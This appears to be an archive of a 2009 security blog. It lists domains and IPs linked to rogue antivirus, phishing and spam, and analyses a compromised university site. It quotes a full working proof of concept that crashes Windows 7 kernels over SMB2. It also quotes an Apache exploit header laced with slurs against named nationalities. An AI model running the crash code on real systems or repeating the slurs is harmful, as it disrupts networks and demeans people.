Friday, November 27, 2009

Rogue Antivirus ** 27-Nov

IP Address: 91.207.116.55

10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover-2010.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.biz
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scan.net
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
greatcrypt.com
hard-xxx-tube.com
mail.10-open-davinci.com
mail.advanced-virus-remover-2009.com
mail.advanced-virus-remover2010.com
mail.advanced-virusremover-2010.com
mail.advanced-virusremover2009.com
mail.advancedvirus-remover-2010.com
mail.advancedvirusremover-2009.com
mail.best-scan-pc.com
mail.best-scan-pc.net
mail.best-scan.com
mail.best-scan.net
mail.best-scanpc.org
mail.cathrynzfunz.com
mail.coolcount1.com
mail.downloadavr6.com
mail.downloadavr7.com
mail.downloadavr8.com
mail.greatcrypt.com
mail.hard-xxx-tube.com
mail.testavrdown.com
mail.testavrdownnew.com
mail.vscodec-pro.net
mail.vsproject.net
mail.xxx-white-tube.net
mail.xxx-white-tube.org
testavrdown.com
testavrdownnew.com
vscodec-pro.net
white-xxx-tube.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.org


IP Address: 87.98.254.201

fastzonescan-now.com
systemprotection-zone.com

IP Address: 88.198.239.161

my-protectedzone.net
static.88-198-239-161.clients.your-server.de
todozone-guard.com


IP Address: 93.174.95.135

experimentalways.com
handutilities.com
mail.experimentalways.com
mail.handutilities.com
mail.toolsand.com
mail.yourtoolscheap.com
ns1.handutilities.com
thesecurityutility.net
toolsand.com
www.dvdprotools.com
www.onlineworldcar.com
www.onlineworldtech.com
www.toolsand.com
www.yourtoolscheap.com
yourtoolscheap.com

Microsoft IE - PDF invisibly embedded with your internal disk paths

Security researcher from SecureThoughts.com posted up the privacy bug of the PDF. This bug occurs when using IE to print locally saved webpages as PDF and affects all IE versions including latest IE 8.

Proof of Concept:

Steps to reproduce:
-------------------
1. Pick a .HTM or .HTML or .MHT file on your local computer.
2. Open this file in IE and click Ctrl-P. OR Right-click the file in explorer and select PRINT from context menu.
4. Select any PDF writer as Printer such as Adobe PDF / CutePDF / PrimoPDF /etc.
5. Click Print. When the PDF writer asks for a filename, provide any name.
6. Open the generated pdf in notepad, and search for “file://” without quotes.

Million of PDF found in Google invisibly to this kind of bug.


Reference:

Tuesday, November 24, 2009

MSN Phishing Site - GoMessenger Apps

I received mail from my friend that entice to check who is blocking my MSN account from MSN Messenger. So obviously, my friend MSN account was compromised to spread spam emails.


"Click Here" will redirecting user to "f2s8.gomessenger.net" phishing site.


IP Address: 77.67.5.12

*.recorta.com
canalquo.com
enlatierra.com
getpando.com
ierotico.com
imaxenes.com
mail.enlatierra.com
mail.getpando.com
mail.ierotico.com
mail.imaxenes.com
mail.music4life.net
mail.recorta.com
music4life.net
ns.ierotico.com
ns.imaxenes.com
ns.recorta.com
ns23.solucioneswebonline.com
ns41.solucioneswebonline.com
recorta.com
www.canalquo.com
www.ierotico.com
www.imaxenes.com
www.recorta.com


IP Address: 204.12.210.212

f2s8.gomessenger.net


IP Address: 200.32.8.145

200-32-8-145.prima.net.ar
4khosting.com
dwdsurfing.com
fmradiofonica.com.ar
gomessenger.net
herbomac.com.ar
mail.fmradiofonica.com.ar
mail.gomessenger.net
mail.herbomac.com.ar
mail.hiphopwear.com.ar
mail.libanoverde.com
mail.msnespia.com
mail.sanpedro.gov.ar
mail.termaldellago.com
mail.youareblocked.com
mail.zapasbasket.com
msnespia.com
ns.4khosting.com
ns.fmradiofonica.com.ar
ns.herbomac.com.ar
ns.hiphopwear.com.ar
ns.msnespia.com
ns.sanpedro.gov.ar
ns.youareblocked.com
ns1.4khosting.com
ns3.4khosting.com
sanpedro.gov.ar
www.4khosting.com
www.gomessenger.net
www.hiphopwear.com.ar
www.msnespia.com
www.sanpedro.gov.ar
www.youareblocked.com
youareblocked.com

Sunday, November 22, 2009

IE7 Denial of Service Exploit PoC

Reference: http://sebug.net/exploit/14956/
SSV ID:14956
SEBUG-Appdir:Internet Explorer
Published:2009-11-22
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
 

Reference: http://sebug.net/exploit/14956/

Wednesday, November 18, 2009

Spam ** 18-Nov-09

IP Address: 66.244.251.13

somexyz.com/funnyonfb?75z6
somexyz.com/funnyonfb?rl2b
somexyz.com/funnyonfb?yihi


IP Address: 74.53.201.82

twitpwr.com/xy9?8673
twitpwr.com/xy9?3091
twitpwr.com/xy9?1362
52.c9.354a.static.theplanet.com
dictionarywords.net
mymessiah.net
partiegirl.com
politicalfever.org
toponenetwork.com
twitpow.com
twitpwr.com
wifiworld.us
www.politicalfever.org
www.twitpwr.com
www.wordsearchfun.com


IP Address: 60.172.223.19

5c1adaf127.qiyeghh.cn
e4be.yetuvrf.cn
8be.lomigrv.cn
d46f.jiqajsl.cn
78c66.tilovyr.cn
992e.xupahgx.cn
703.luforjm.cn
172.luforjm.cn
e01a6600.belaxwb.cn
3f130a.mobuxgf.cn


IP Address: 122.116.32.126

hostmaster.now.to
now.to
nowtotest.com
www.now.to


IP Address: 60.172.210.3

*.iybvuvue.cn
barrington.steadybreak.com
bentham.steadywall.com
bibscreen.com
breakwin.com
darkfrom.com
intrigue.steadyblur.com
iybvuvue.cn
killjoy.steadybreak.com
linefollow.com
ns1.nicebob.com
ns2.countrydnsname.com
ns2.dnsgetonline.com
ns2.fullmountdns.com
ns2.grabdnsinfo.com
ns2.hostmasterpro.com
ns2.linkdnspowersetup.com
ns2.linkdnssetup.com
ns2.roadhostdns.com
ns2.skyhostingpower.com
ns2.wallpaperdns.com
ns2.wishstardns.com
ns2.worlddnstype.com
towelnow.com
www.iybvuvue.cn
alesign.com
bigger-yourpenis.com
breakwin.com
btokitkv.cn
bvtibots.cn
darkfrom.com
frcappgs.cn
frcappoi.cn
hourtank.com
ivuotjus.cn
izxacrua.cn
linefollow.com
linkdnssetup.com
needsand.com
penispi11.com
roadhostdns.com
rolexoffertoday.com
skyeclean.com
wishstardns.com


IP Address: 218.10.16.108

*.iybvuvue.cn
acaieliteweight.com
iybvuvue.cn
www.iybvuvue.cn

IP Address: 201.7.103.58

*.ahpezkut.com
*.atquackephix.com
*.beststoremedswellbeing.com
*.bihdeawy.com
*.foxwyqwac.com
*.fyenpimbec.net
*.glagsyclax.com
*.healthenlargementpill.com
*.hlaedoahma.com
*.hlevombyx.com
*.hovhanjal.com
*.pharmacystonetablets.com
*.qubcicvowy.net
*.qukmifnuo.com
*.qwyzkiegwy.com
*.sohfevevyl.com
*.yupdytytix.com
alhilfaika.com
behmaibkan.com
bestdrugtorepills.com
beststoremedswellbeing.com
bestviagrarx.com
bihdeawy.com
cviadoaz.com
djiatisfu.com
dwocefhial.com
ebsajgij.com
ezloxjib.com
fisysdubb.com
fufyhzeyjhi.com
fyenpimbec.com
fyenpimbec.net
fyxaohziju.com
glagsyclax.com
goxtixunas.net
gyghoisre.com
healthenlargementpill.com
healthfoodmedsguide.com
hlevombyx.com
homru.com
hovhanjal.com
kidqurax.com
lsnlue.redsouk.com
lusfidbeu.com
lyplumudwub.com
mail.aexhagijho.com
mail.ahpezkut.com
mail.bestdrugtorepills.com
mail.beststoremedswellbeing.com
mail.bihdeawy.com
mail.djiatisfu.com
mail.ezloxjib.com
mail.foxwyqwac.com
mail.foxwyqwac.net
mail.fyenpimbec.com
mail.fyenpimbec.net
mail.glagsyclax.com
mail.greatpillreview.com
mail.healthenlargementpill.com
mail.hlevombyx.com
mail.hovhanjal.com
mail.pharmacystonetablets.com
mail.qubcicvowy.net
mail.qwyzkiegwy.com
mail.sohfevevyl.com
merfeget.com
ns1.aexhagijho.com
ns1.atquackephix.com
ns1.beststoremedswellbeing.com
ns1.bihdeawy.com
ns1.ekhahpaxen.net
ns1.ezloxjib.com
ns1.fisysdubb.com
ns1.foxwyqwac.net
ns1.fufyhzeyjhi.com
ns1.fyenpimbec.com
ns1.glagsyclax.com
ns1.goxtixunas.net
ns1.healthfoodmedsguide.com
ns1.hlevombyx.com
ns1.pharmacystonetablets.com
ns1.qubcicvowy.net
ns1.qwyzkiegwy.com
ns1.zmigtyby.com
ns2.aexhagijho.com
ns2.ahpezkut.com
ns2.atquackephix.com
ns2.behmaibkan.com
ns2.bestdrugtorepills.com
ns2.beststoremedswellbeing.com
ns2.bihdeawy.com
ns2.ekhahpaxen.net
ns2.foxwyqwac.com
ns2.fyenpimbec.com
ns2.fyenpimbec.net
ns2.glagsyclax.com
ns2.goxtixunas.net
ns2.greatpillreview.com
ns2.healthenlargementpill.com
ns2.healthfoodmedsguide.com
ns2.hlaedoahma.com
ns2.hlevombyx.com
ns2.pharmacystonetablets.com
ns2.qubcicvowy.net
ns2.qwyzkiegwy.com
ns2.yupdytytix.com
ns2.zmigtyby.com
pharmacystonetablets.com
qubcicvowy.net
qwiquhvyrumy.com
qwofyuhl.net
qwyzkiegwy.com
redsouk.com
skajhewsypy.com
tuamecwojl.com
tuftiqwime.com
viahwanmu.com
vnoedcyl.net
xyhjapquf.net
yezuynbez.com
zvymmogwu.net
beststoremedswellbeing.com
goxtixunas.net
qubcicvowy.net
zmigtyby.com
yupnyojrufl.com
yovneynmap.com
www.iwrlyoue.cn


IP Address: 60.172.210.4

*.bjogivos.cn
*.cbuhovig.cn
*.ddekowim.cn
*.dimaxal.cn
*.djubatuj.cn
*.gguwelag.cn
*.gnaburen.cn
*.gpucivek.cn
*.hfizipan.cn
*.hlapowoc.cn
*.jagegop.cn
*.jduridew.cn
*.jogawaw.cn
*.kqadibul.cn
*.lxucubaf.cn
*.nevutud.cn
*.nwurakex.cn
*.nxugiral.cn
*.pnunidun.cn
*.psavapip.cn
*.pxefidag.cn
*.pzuqeleh.cn
*.qgohogok.cn
*.rikanoj.cn
*.rwihopot.cn
*.slujarug.cn
*.sxopiken.cn
*.ttanames.cn
*.vsaqifuj.cn
*.xlejuwof.cn
*.yveqekov.cn
*.zsojexuh.cn
*.zsumuhey.cn
*.zxatuyox.cn
0cb26.jduridew.cn
178.zsezukes.cn
2002.vkalufor.cn
230951.gcuzipoj.cn
2edb5.jogawaw.cn
303190.jyasuhev.cn
3293ae.bjexipat.cn
38b680.xreyupuc.cn
402.zulapep.cn
428c.ntademef.cn
4ea6.pzuqeleh.cn
51cf.xpasetad.cn
523.fmacinuy.cn
532b.jjobijen.cn
5965a.sxuzejaf.cn
5c563.cquconej.cn
66d2f3.gzuvafuz.cn
66ead0.qnabefuc.cn
68e4a.gxohudet.cn
6bf8.nxugiral.cn
702.rwihopot.cn
8a4695.txusinuf.cn
8acc.zsumuhey.cn
90c06.dkaxirey.cn
9340e.zcuxedoc.cn
9d8d1.bjidasut.cn
b1ec.hlapowoc.cn
b26.nwifiwed.cn
b555.gnaburen.cn
ba94.rwukison.cn
benefit.gyefocev.cn
bj9.ru
borngentle.com
c852.cvupuqal.cn
d11.hfizipan.cn
d57e8.klosoqiw.cn
dc7f.qgapefey.cn
e75.jagegop.cn
eb0.pxefidag.cn
eef56.lyalojuf.cn
everest.qdegivah.cn
f984.jnomariq.cn
gguwelag.cn
gxohudet.cn
hlapowoc.cn
jagegop.cn
jyasuhev.cn
klosoqiw.cn
kmakafum.cn
lqafokuw.cn
lxucubaf.cn
mhuhafuy.cn
movement.qlonipaf.cn
nevutud.cn
ntademef.cn
overal.wsemuhin.cn
pxefidag.cn
pyonelul.cn
qcesipof.cn
qforuhum.cn
rikanoj.cn
rkujalal.cn
rwihopot.cn
sxopiken.cn
sxuzejaf.cn
vkalufor.cn
www.ddekowim.cn
www.lxucubaf.cn
www.slujarug.cn
www.zziduxux.cn
xcopidox.cn
xehicaw.cn
xlejuwof.cn
xreyupuc.cn
xzewutos.cn
ysuyonoh.cn
yveqekov.cn
zicorem.cn
zsezukes.cn
zulapep.cn
zziduxux.cn
www.sokubpq.cn
www.wuxezgr.cn
www.johicfy.cn
www.yogerht.cn
www.mitugwy.cn
www.jeraysw.cn


IP Address: 60.172.210.5

*.8888r.com
*.baidugame.cn
*.hondy.net
*.sf66666.com
*.wuhu365.com
1maile.com
51jsbbs.com
7cspk.com
8888r.com
ahfcst.com
ahhaopu.com
bu2007.com
fagao888.com
fcjstz.com
gyljf.com
hkyurun.com
hnjpt.com
hzshuiyun.com
jcfw2008.com
nlaixin.com
nojetpm.com
nxspxx.com
rijinmuju.com
sylzgy.com
szsdck.com
weinotts.com
whcbzs.com
whyrhz.com
wuhu365.cn
wuhu365.com
wuhucrm.cn
wuhugogo.com
wuhumail.com
wuhuprinter.com
www.wuhu365.com
xinyuemusic.com
xn--49ss1hl9pext.com
yjgafj.com


IP Address: 60.172.210.2

0514pet.cn
075700.com
jsbabys.cn
nntao.net
www.0514pet.cn
www.jsbabys.cn
www.jxqb.com

IP Address: 208.67.219.132

www.@securerxpharm.com
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org
www.iiujpoue.cn
www.iqegweue.cn
www.igfgxlue.cn

IP Address: 124.217.214.22

naturalmeed.com

Monday, November 16, 2009

Apache 2.2.0 - 2.2.11 Remote exploit

/*  ========   !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE! ================= 
Apache 2.2.0 - 2.2.11 Remote exploit  Exploiting an off-by one bug in apr_uri_parse_hostinfo()
which leads to allocation of arbitrary ammount of memory, put the shellcode then reliably jump 
in upon invocation  of the APR callback.  
Compile: gcc fuckapache.c -o fuckapache  Usage: ./fuckapache     
E.g: =========================================================== 
[test@localhost tmp]$ ./fuck localhost 80 Connected, sending out the evil request... 
Waiting some seconds to see if we got shell... Now type nc localhost 12345 to see if you've got shell there 
[test@localhost tmp]$ nc localhost 12345 id uid=48(apache) gid=48(apache) groups=48(apache) ^D  
========================================================== 
==========================================================

Fuck all script kiddies around the world. No more free bugs, get lost.

Fuck all Indonesian, Malaysian, Pakistani, Saudi, Marrocan, Nigerian,
Turkish and other third-world *hack3rz* whose only contribution to the
world is writing dummy sqli scripts in python flooding the net
with BS like "kekekekeke" "ajjajaja" "i kill you". 
Feel free to suck my balls, all of you.

Have phun :)

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void usage(char *argv[])
{
    printf("Usage: %s  \n\n",argv[0]);
    exit(1);
}

Full script can be obtained from http://pastebin.com/f5571e439
Reference: http://sebug.net/exploit/12636/[Broken Link]

Friday, November 13, 2009

education website compromised to host rogue antiviraprof2009.com

Today my readers sent me email reported about their University website was compromised to host malicious code. Iframe with link "hxxp://davtraff.com/lib/index.php" was inserted under main page.

Note: Second visit to similar website will redirecting users to Google page.


"hxxp://davtraff.com/lib/index.php" contain obfuscated exploit code (CVE-2006-0003)that will redirecting to another link "213.163.89.54" to download rogue av installer "e0ab531ec312161511493b002f9be2ee.exe" that detected as "SpywareGuard2008" by Symantec.

The summary ThreatExpert Report for "e0ab531ec312161511493b002f9be2ee.exe"

Besides that, malicious pdf file, adobe flash file and java class script were downloaded to perform modification and changes on the victim systems. Those files have low detection rate from Virustotal analysis report.

28_firstSomeLooks.pdf Virustotal Report
29_freeLooks.swf Virustotal Report
30_useGoingBook.class Virustotal Report
31_firstSomeLooks.pdf Virustotal Report

This time, exploit used in crafted PDF contains:
- Adobe util.printf overflow CVE-2008-2992
- Adobe getIcon CVE-2009-0927

Below is the screenshot for the Antivirus System Pro that installed in your systems with process name "jfppsysguard.exe" (Trojan) and gain low detection rate at 7/41 Virustotal Report.



hxxp://antiviraprof2009.com

Besides that, HOSTS file was updated with URL-to-IP mappings
********************************************************
127.0.0.1 localhost
::1 localhost
91.212.127.227 antiviraprof2009.microsoft.com
91.212.127.227 antiviraprof2009.com
91.212.127.227 www.antiviraprof2009.com
********************************************************

Domains and IP address involved:
- davtraff.com -> 213.163.89.54
- antiviraprof2009.com -> 193.169.12.50
- 91.212.127.227

Domains sharing same IP address "213.163.89.54"

*.davtraff.com
*.edcomparison.com
*.fuadrenal.com
*.google-analyze.cn
*.google-analyze.org
*.m-analytics.net
*.odile-marco.com
*.odmarco.com
*.reycross.cn
*.reycross.com
*.yahoo-analytics.net
57yq57.davtraff.com
7mzkrq.davtraff.com
davtraff.com
edcomparison.com
fuadrenal.com
fzfaw6.davtraff.com
google-analyze.org
kembe2.davtraff.com
m-analytics.net
odmarco.com
reycross.cn
reycross.com
statanalyze.cn
www.davtraff.com
www.edcomparison.com
www.m-analytics.net
www.odile-marco.com
www.odmarco.com
www.reycross.cn
www.reycross.com
www.yahoo-analytics.net
yahoo-analytics.net

Domains sharing same IP address "193.169.12.50"

coantivirus.com
euroantivirus.com
ns1.coantivirus.com
ns1.euroantivirus.com
ns1.os-secure2009.com
ns1.winsecure2009.com
ns1.winwarepro.com
os-secure2009.com
winsecure2009.com
winwarepro.com
www.coantivirus.com
www.os-secure2009.com
www.winsecure2009.com
www.winwarepro.com

Thanks
--X0end

Windows 7/Server 2008RC Remote Kernel Crash - Zero Day Exploit

Reference: http://g-laurent.blogspot.com

Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come.

Thursday, November 12, 2009

Spam ** 12-Nov-09

IP Address: 213.155.22.193

Domains sharing same IP address:

*.bnewage.com
*.fasynet.com
*.jainpage.com
*.lewstime.com
*.mainlage.com
*.nedwage.com
*.omeair.com
*.onlinefree-scan.com
*.pcalertsite.com
*.pcnoticesecurity.com
*.quicklini.com
*.roublenuk.com
*.somecelan.com
*.tivelife.com
*.vcashpay.com
*.xoublenuk.com
casnpay.com
checkerforfree.com
datatrustprotect.com
fastnety.com
fastrnet.com
faxtnet.com
fdoublenuk.com
firstyplace.com
hlmv.com
jainpage.com
litnmail.com
mail.checkerforfree.com
mail.checkmy-pcnow.com
mail.malware-reaper.com
mail.pcthreatremover.com
mail.pctrouble-remover.com
mail.scan-4-clean.com
mail.scareware-killer.com
nnewage.com
ns1.aelrtcenter.com
ns1.bnewage.com
ns1.casnpay.com
ns1.checkerforfree.com
ns1.checkmy-pcnow.com
ns1.datatrustprotect.com
ns1.doublenuks.com
ns1.fastnety.com
ns1.fastrnet.com
ns1.fasynet.com
ns1.faxtnet.com
ns1.fdoublenuk.com
ns1.firstyplace.com
ns1.freatdinner.com
ns1.ispyremover.com
ns1.jainpage.com
ns1.lewstime.com
ns1.liftven.com
ns1.litmai.com
ns1.litnmail.com
ns1.main-age.com
ns1.mainlage.com
ns1.malware-reaper.com
ns1.nedwage.com
ns1.nnewage.com
ns1.omeair.com
ns1.onlinefree-scan.com
ns1.onlinelivescanner.com
ns1.pcalertsite.com
ns1.pcnoticesecurity.com
ns1.pcthreatremover.com
ns1.pctrouble-remover.com
ns1.plitmail.com
ns1.quicklini.com
ns1.roublenuk.com
ns1.scan-4-clean.com
ns1.scareware-killer.com
ns1.secmodify.com
ns1.secupgrade.com
ns1.sokeair.com
ns1.some-air.com
ns1.somecelan.com
ns1.someclen.com
ns1.somewair.com
ns1.somewir.com
ns1.somsclean.com
ns1.somweclean.com
ns1.thealertsecurity.com
ns1.tivelife.com
ns1.topspyfreecheck.com
ns1.vcashpay.com
ns1.xoublenuk.com
ns1.yourguardpc.com
ns1.zeropspy.com
ns1.zonewecurity.com
omeair.com
onlinefree-scan.com
onlinelivescanner.com
pcalertsite.com
plitmail.com
secmodify.com
secupgrade.com
some-air.com
somecelan.com
somewir.com
somsclean.com
tivelife.com
vcashpay.com
www.malware-reaper.com
www.topspyfreecheck.com
www.vcashpay.com
www.yourguardpc.com
yourguardpc.com
zonewecurity.com
faxtnet.com
firstyplace.com
freatdinner.com
litmai.com
onlinelivescanner.com
quicklini.com
somecelan.com


IP Address: 213.155.22.194

Domains sharing same IP address:

*.casnpay.com
*.datatrustprotect.com
*.doublenuks.com
*.fastnety.com
*.fastrnet.com
*.faxtnet.com
*.fdoublenuk.com
*.gvirusprotect.com
*.liftven.com
*.litnmail.com
*.malwardetect.com
*.nnewage.com
*.secmodify.com
*.secupgrade.com
*.someclen.com
*.somsclean.com
*.somweclean.com
*.yourguardpc.com
*.zonewecurity.com
bnewage.com
doublenuks.com
fasynet.com
gvirusprotect.com
ispyremover.com
lewstime.com
liftven.com
nedwage.com
ns2.aelrtcenter.com
ns2.bnewage.com
ns2.casnpay.com
ns2.checkmy-pcnow.com
ns2.datatrustprotect.com
ns2.doublenuks.com
ns2.fastnety.com
ns2.fastrnet.com
ns2.fasynet.com
ns2.faxtnet.com
ns2.fdoublenuk.com
ns2.gvirusprotect.com
ns2.ispyremover.com
ns2.lewstime.com
ns2.liftven.com
ns2.litnmail.com
ns2.malwardetect.com
ns2.malware-reaper.com
ns2.nedwage.com
ns2.nnewage.com
ns2.onlinefree-scan.com
ns2.onlinelivescanner.com
ns2.pcalertsite.com
ns2.pcnoticesecurity.com
ns2.pcthreatremover.com
ns2.pctrouble-remover.com
ns2.quicklini.com
ns2.roublenuk.com
ns2.scan-4-clean.com
ns2.scareware-killer.com
ns2.secmodify.com
ns2.secupgrade.com
ns2.somecelan.com
ns2.someclen.com
ns2.somsclean.com
ns2.somweclean.com
ns2.thealertsecurity.com
ns2.tivelife.com
ns2.topspyfreecheck.com
ns2.vcashpay.com
ns2.xoublenuk.com
ns2.yourguardpc.com
ns2.zonewecurity.com
ocscanner.com
quicklini.com
roublenuk.com
someclen.com
somweclean.com
thealertsecurity.com
www.nnewage.com
www.onlinefree-scan.com
www.pcnoticesecurity.com
www.thealertsecurity.com
xoublenuk.com
zeropspy.com
faxtnet.com
lewstime.com
onlinefree-scan.com
quicklini.com
roublenuk.com
xoublenuk.com
yourguardpc.com

IP Address: 85.12.25.110

Domains sharing same IP address:

*.bigsald.com
*.finedcar.com
*.firstyplace.com
*.freatdinner.com
*.jucefresh.com
*.juicefresn.com
*.juixefresh.com
*.litmai.com
*.main-age.com
*.plitmail.com
*.sokeair.com
*.some-air.com
*.somewair.com
*.somewir.com
*.uxflat.com
bigsald.com
birspel.com
finedcar.com
freatdinner.com
igfight.com
juicefresn.com
juixefresh.com
litmai.com
main-age.com
mainlage.com
ns1.bigsald.com
ns1.bigssle.com
ns1.bigvight.com
ns1.elltime.com
ns1.finedcar.com
ns1.ibrdspel.com
ns1.igfight.com
ns1.jucefresh.com
ns1.juicefresn.com
ns1.juixefresh.com
ns1.uxflat.com
ns1.vindcar.com
ns1.welltome.com
ns2.firstyplace.com
ns2.freatdinner.com
ns2.jainpage.com
ns2.litmai.com
ns2.main-age.com
ns2.mainlage.com
ns2.omeair.com
ns2.plitmail.com
ns2.sokeair.com
ns2.some-air.com
ns2.somewair.com
ns2.somewir.com
sokeair.com
uxflat.com
welltome.com
www.tindcar.com
bigsae.com
bigvight.com
nigsale.com
plitmail.com
poresskey.com
welltome.com

IP Address: 69.4.230.140

Domains sharing same IP address:

multidl.com
www.multidl.com

AntiAID Fake Antivirus

AntiAID fake antivirus


antiaid.com - 85.12.25.111

*.blockkeeper.com
*.systemveteran.com
antiaid.com
blockkeeper.com
blockprotector.com
ns1.blockkeeper.com
ns1.blockprotector.com
ns1.systemfighter.com
ns1.systemveteran.com
ns1.systemwarrior.com
systemveteran.com
www.blockkeeper.com
blockkeeper.com
blockprotector.com
systemfighter.com
systemveteran.com
systemwarrior.com

Tuesday, November 10, 2009

Spam ** 10-Nov-09

IP Address:
121.11.85.32
218.75.149.156

www.iptobmue.cn
admin.blushcold.com
admin.iqbgwrue.cn
admin.sunwrong.com
bell.roundflow.com
bendbrand.com
bgu735.ocsmncea.cn
blahbeauty.com
blushcold.com
blushwire.com
catlike.cruisesound.com
code59884.rolexoffertoday.com
cruisesound.com
flushstick.com
iawhosue.cn
iqbgwrue.cn
lgt674.iawhosue.cn
marlinautumn.com
marlinsign.com
nrnpf343.aijnaido.cn
ns1.getsomedns.com
ns1.marlinsign.com
ns1.onlinetagdns.com
ns1.serverraw.com
ns1.sunwrong.com
ns2.dnslackingtemp.com
ns2.iqmeiuea.cn
ns2.marlinsign.com
nucleic.marlinautumn.com
ocsmncea.cn
osjjjzea.cn
seamarlin.com
siberia.marlinautumn.com
since.brownsunny.com
smart.marlinsign.com
smart.seamarlin.com
stipple.brownsunny.com
sunwrong.com
www.blahbeauty.com
www.flushstick.com
www.sunwrong.com

IP Address:
218.93.202.120
60.172.210.4

6678net.com
chinacarveout.com
chinadigger.com
chinajiaoao.com
cmccblog.com
cuninfo.com
cuniv.com
jinjk.com
jiwudu.com
mail.cmccblog.com
maogai.com
oumel.com
yiyixue.com
yybest.com
0cb26.jduridew.cn
178.zsezukes.cn
2002.vkalufor.cn
230951.gcuzipoj.cn
2edb5.jogawaw.cn
303190.jyasuhev.cn
3293ae.bjexipat.cn
38b680.xreyupuc.cn
402.zulapep.cn
428c.ntademef.cn
4ea6.pzuqeleh.cn
51cf.xpasetad.cn
523.fmacinuy.cn
532b.jjobijen.cn
5965a.sxuzejaf.cn
5c563.cquconej.cn
66d2f3.gzuvafuz.cn
66ead0.qnabefuc.cn
68e4a.gxohudet.cn
6bf8.nxugiral.cn
702.rwihopot.cn
8a4695.txusinuf.cn
8acc.zsumuhey.cn
90c06.dkaxirey.cn
9340e.zcuxedoc.cn
9d8d1.bjidasut.cn
b1ec.hlapowoc.cn
b26.nwifiwed.cn
b555.gnaburen.cn
ba94.rwukison.cn
benefit.gyefocev.cn
bj9.ru
borngentle.com
c852.cvupuqal.cn
d11.hfizipan.cn
d57e8.klosoqiw.cn
dc7f.qgapefey.cn
e75.jagegop.cn
eb0.pxefidag.cn
eef56.lyalojuf.cn
everest.qdegivah.cn
f984.jnomariq.cn
gguwelag.cn
gxohudet.cn
hlapowoc.cn
jagegop.cn
jyasuhev.cn
klosoqiw.cn
kmakafum.cn
lqafokuw.cn
lxucubaf.cn
mhuhafuy.cn
movement.qlonipaf.cn
nevutud.cn
ntademef.cn
overal.wsemuhin.cn
pxefidag.cn
pyonelul.cn
qcesipof.cn
qforuhum.cn
rikanoj.cn
rkujalal.cn
rwihopot.cn
sxopiken.cn
sxuzejaf.cn
vkalufor.cn
www.ddekowim.cn
www.lxucubaf.cn
www.slujarug.cn
www.zziduxux.cn
xcopidox.cn
xehicaw.cn
xlejuwof.cn
xreyupuc.cn
xzewutos.cn
ysuyonoh.cn
yveqekov.cn
zicorem.cn
zsezukes.cn
zulapep.cn
zziduxux.cn
www.fosigwc.cn
